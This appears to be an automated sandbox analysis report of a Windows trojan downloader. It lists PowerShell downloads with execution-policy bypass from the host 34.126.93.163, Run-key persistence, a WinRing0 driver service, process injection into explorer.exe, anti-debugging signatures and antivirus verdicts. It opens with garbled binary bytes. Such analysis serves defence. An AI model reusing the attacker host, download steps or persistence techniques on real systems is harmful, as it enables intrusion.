fþýfïßfnL$((ÃfbÊfrófrÐfïÃfn\$(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$$fbØ(D$`fbÙfþßfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfnþfþÖfpÛ9(ÂfïÄfpâNfnT$((ÈfrÐfrñfïÈfnD$0fbøfpé“fnL$fbÊfbùfþ|$PfþýfnL$4fïßfnÐ(ÃfbÊfrÐfrófïÃfn\$ (ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$fbØ(D$`fbÙfþßfn|$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpۓfþÖ(ÂfïÄfpâNfnT$$(ÈfrÐfrñfïÈfnÁfbøfpé9fnÏfbÊfbùfþ|$Pfþýfïß(ÃfrófrÐfïÃ(ð)D$`fþô(ÆfïÅ(àfnL$ fn\$,frÐ frôfnÒfïàfbÊfnD$fbØ(D$`fbÙfþßfn|$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâNfnT$,(ÈfrÐfrñfïÈfnD$ fbøfpé“fnL$4fbÊfbùfþ|$PfþýfnÑfïßfnÈ(ÃfbÊfrÐfrófïÃfnß(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$(fbØ(D$`fbÙfþßfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpۓfþÖ(ÂfïÄfpâN(ÈfnÒfrñfrÐfïÈfpé9fnD$fn|$0fbøfnÎfbÊfbùfþ|$PfnT$fþýfïßfnL$(ÃfbÊfrÐfrófïÃfn\$$(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$ fbØ(D$`fbÙfþßfnúfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâNfnT$(ÈfrÐfrñfïÈfnD$fbøfpé“fnÉfbÊfbùfþ|$PfnT$fþýfnL$ fïß(ÃfbÊfrófrÐfïÃfn\$$(ð)D$`fþô(ÆfïÅ(àfrÐ frôfïàfnD$fbØfbÙfþßfþÜ(D$`fïÃ)\$P(ØfnÿfrÐfró_fïØ(ÓfpۓfþÖ(ÂfïÄfpâN(ÈfnÖfrÐfrñ^fïÈfnD$ fbøfpé9fnÈfbÊfbùfþ|$HfnT$$fþýfnL$,fïß(ÃfbÊfrÐfró‹D$4fïÃ(ð)D$Xfþô(ÆfïÅfnl$(àfrÐ frôfïàfnD$(fbè(D$XfbéfþïfþìfïÅ(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄ(ÈfrÐfrñfïÈfpÂNfïÅfpɓfïD$hfïÙfï\$8)‹E‹€ô)X3À‹å]ÂV‹t$Wƒ¾@vE‹†øƒ@‹Žøƒ9@À÷ØAÿ¶ðVè(éÿÿ‹Žðƒ†Àÿ¶A@PQèjˆƒÄ ‹†ø‹–‹Žø9À÷ØA€¾t ‹†üƒHÿ‹†ü3ÿƒÿ¸€‹Ž+ÁP‹†ðÁWP识ƒÄ ÿ¶ðVè¡èÿÿ‹L$‹†ô‹‰ƒÇƒÿ |ì_^ƒ=hD|(`C)€«C(PC)«CV‹t$‹Îè 3ҋŽô‹‚(C‰ ƒÂƒú |鋆ô0 ‹Žô‹D$ 1A‹Žô‹D$ Áà1A ^ W‹|$…ÿ„²SU‹l$V‹t$‹Ž»€‹†ð+ÙÁ‰|$;ûvfSUPè*‡‹†øƒÄ žƒ@‹Žøƒ9@À÷ØAƒ=hDÿ¶ðV|èiìÿÿëèçÿÿ‹Žðj@A@PQèچƒ†ÀƒÄ +ûëWUPèĆ¾ƒÄ ‹\$3ÿë…ÿ…\ÿÿÿ^][_ ìSUVW‹¼$l$3ö‹ß‹‡H ;Æv+ƃø@vj@XP‡H ÆPSèÿÿÿUSè¥ýÿÿƒÆ@ƒÅ ÃþrÁjÇ@t$[j VWèÏþÿÿƒÆ ƒëuïÿ´$Wèfýÿÿ_^][ÄÂSUV‹t$3íWhU†H P蘄ƒÄ ‰®H †@jUPèýýÿÿ‹ý‹ÞUWSèñýÿÿGÃƒÿrì_ƆD Ɔ<^][ƒìlS‹\$xU‹l$xV¾W‹…H
Data sent GET /xm/win.com HTTP/1.1 Host: 34.126.93.163 Connection: Keep-Alive
Data sent GET /xm/64a1.com HTTP/1.1 Host: 34.126.93.163 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x000000000000023c
process_name: conhost.exe
process_identifier: 1596
0 0

Process32NextW

 snapshot_handle: 0x0000000000000240
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000244
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000248
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x000000000000024c
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000250
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000254
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000258
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x000000000000025c
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000260
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000274
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000284
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000288
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000280
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000290
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000294
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x000000000000028c
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x000000000000029c
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002a0
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000298
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002a8
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002ac
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002b0
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002a4
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002b8
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002bc
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002b4
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002c0
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002d0
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002cc
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002d8
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002d4
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002dc
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002e0
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002e4
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002ec
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002e8
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002f0
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002f4
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002f8
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000300
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000304
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x00000000000002fc
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000308
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000310
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000314
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x000000000000030c
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x000000000000031c
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000320
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

 snapshot_handle: 0x0000000000000324
process_name: taskhost.exe
process_identifier: 2092
0 0
description Affect system registries rule win_registry
description Affect system token rule win_token
description Affect private profile rule win_private_profile
description Affect private profile rule win_files_operation
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
cmdline ping 127.0.0.1 -n 5
cmdline ping 127.0.0.1 -n 10
host 34.126.93.163
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Microsoft Manager reg_value C:\Windows (x86)\explorer.exe
Time & API Arguments Status Return Repeated

CreateServiceW

 service_start_name:
start_type: 3
password:
display_name: WinRing0_1_2_0
filepath: C:\Windows (x86)\WinRing0x64.sys
service_name: WinRing0_1_2_0
filepath_r: C:\Windows (x86)\WinRing0x64.sys
desired_access: 983551
service_handle: 0x00000000004f4100
error_control: 1
service_type: 1
service_manager_handle: 0x00000000004f3f50
1 5193984 0
file C:\Users\test22\AppData\Local\Temp\updateW\win.com
Time & API Arguments Status Return Repeated

WSASend

 buffer:  )å?ºò\tú5—§¿~˜þ¤Ï‚;¨‚ö6#vFÜe }}¤a ªFŸxàz{'(HÛ·²£ÎBÉ¡„"¦>À,À0ŸÌ©Ì¨ÌªÀ+À/žÀ$À(kÀ#À'gÀ À9À À3œ=<5/ÿ•  # 0.   + -3&$ Õ0dƒlœI57~y•æ›ø9úm`,e¨gÛ»r
socket: 528
0 0

WSASend

 buffer: E§¡‡û°ãüà¾Éš­À*žtÔ4ù‚WŸÇGDzÐZ`-F¾Ã‡Ç› Š†5¡8ß$J»«Èh̑N9 » b.’©ÜÑÿ…0t’\B —'á³¼$}ÌŘkT;†7²ñ߸¶ bœuZ°P6®ï^q§Á3I˜éL õü7ÓSüa¹¨9ðÓ%wÌò•l/<¸n¶?N8ⱲǾ±²Lê?±hiôNu@<žòe#¡=À!v¨°éP„ûÅÙ¨Åcµ¢ußݪ8ÚFŸŸxa•°ïÆ!•Ü˜CÄ~ç€rËåV>Vçû!Bû?# ; ÜÝP£§…D?%y5„pW £G¢(Äè»w¡÷·}Lë[vªb€¬µ‡æ!7mgr¿8ê¦èwM­M™ªº—fØsŠƒpc%¨¢IH·ûŽ¸Io</Ç($@.ê^W„)÷ÀžWGÞ"v(µ´µAτ†öñI µ‰šdS[9ãW@á90gôÎ¥'¢œYM ½æ(áúNæØ-3¹´·Y+òk5Ù¨… Eûµ¾Nie˜šÿM”¬ƒrñ“Ù•¸SÔ2ÊHåÀž®µ¦k¶f®ƒŠ¨§4íL?9£ÿ?<E2®|e}§Úlh£l+g½ö:èHYIÁ ú†#Nðð8F,Blazâ£ÓÄíÖzíÔS!ÉKæŽ8¹¢0öóŒäwNÌV?Ýp G™ì\š°t²`o(Ë ¦£À{»=ÿ ÝÙþØñùB¶¯8.ê!×tKÌݑ5Nădz ¹,#,ân`¹d,1ë¤ZK9uÜ
socket: 528
0 0
Time & API Arguments Status Return Repeated

send

 buffer: GET /xm/win.com HTTP/1.1 Host: 34.126.93.163 Connection: Keep-Alive
socket: 1420
sent: 73
1 73 0

send

 buffer: GET /xm/64a1.com HTTP/1.1 Host: 34.126.93.163 Connection: Keep-Alive
socket: 1436
sent: 74
1 74 0
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\updateW\win.com"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\updateW\win.com
parent_process wscript.exe martian_process "C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat"
parent_process wscript.exe martian_process C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\updateW\64a1.com"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
Process injection Process 2648 resumed a thread in remote process 1160
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000002e8
suspend_count: 1
process_identifier: 1160
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 3016
thread_handle: 0x000002e8
process_identifier: 2196
current_directory: C:\Windows (x86)
filepath: C:\Windows (x86)\explorer.exe
track: 1
command_line: "C:\Windows (x86)\explorer.exe"
filepath_r: C:\Windows (x86)\explorer.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002f0
1 1 0

ShellExecuteExW

 show_type: 1
filepath_r: C:\Windows (x86)\explorer.exe
parameters:
filepath: C:\Windows (x86)\explorer.exe
1 1 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
value Uses powershell to execute a file download from the command line
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
value Uses powershell to execute a file download from the command line
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

 information_class: 76 (SystemFirmwareTableInformation)
-1073741789 0
Bkav W32.AIDetect.malware2
McAfee RDN/Generic.dx
Cylance Unsafe
Alibaba Trojan:Win32/AutoitInject.513c1428
K7GW Trojan ( 005036361 )
CrowdStrike win/malicious_confidence_60% (W)
Arcabit Trojan.Generic.D22FAC3D
Symantec Downloader
ESET-NOD32 multiple detections
APEX Malicious
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.36678717
NANO-Antivirus Trojan.Script.Dwn.ehnknf
MicroWorld-eScan Trojan.GenericKD.36678717
Avast SFX:Agent-E [Trj]
Tencent Powershell.Trojan.Generic.Aduc
Ad-Aware Trojan.GenericKD.36678717
Comodo TrojWare.Win32.TrojanDownloader.BadShell.XST@7pmj40
McAfee-GW-Edition BehavesLike.Win32.Generic.dh
FireEye Trojan.GenericKD.36678717
Emsisoft Trojan.GenericKD.36678717 (B)
MAX malware (ai score=88)
Gridinsoft Trojan.Win32.Downloader.sa
Microsoft Trojan:Win32/AutoitInject.BI!MTB
AegisLab Trojan.PowerShell.Generic.4!c
ZoneAlarm HEUR:Trojan.PowerShell.Generic
GData Trojan.GenericKD.36678717
ALYac Heur.BZC.ONG.Boxter.371.2FE094D5
TrendMicro-HouseCall TROJ_GEN.R002C0DDA21
Rising Trojan.Ursnif!8.A22D (TOPIS:E0:A0I4dgv936)
Ikarus Trojan.VBS.Ursnif
MaxSecure Win.MxResIcn.Heur.Gen
AVG SFX:Agent-E [Trj]
Cybereason malicious.784185
Panda Trj/CI.A
Qihoo-360 Win32/Trojan.AutoitInject.HwYDf4cA
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\test22\AppData\Local\Temp\updateW\win.com
file C:\Users\test22\AppData\Local\Temp\updateW\64a1.com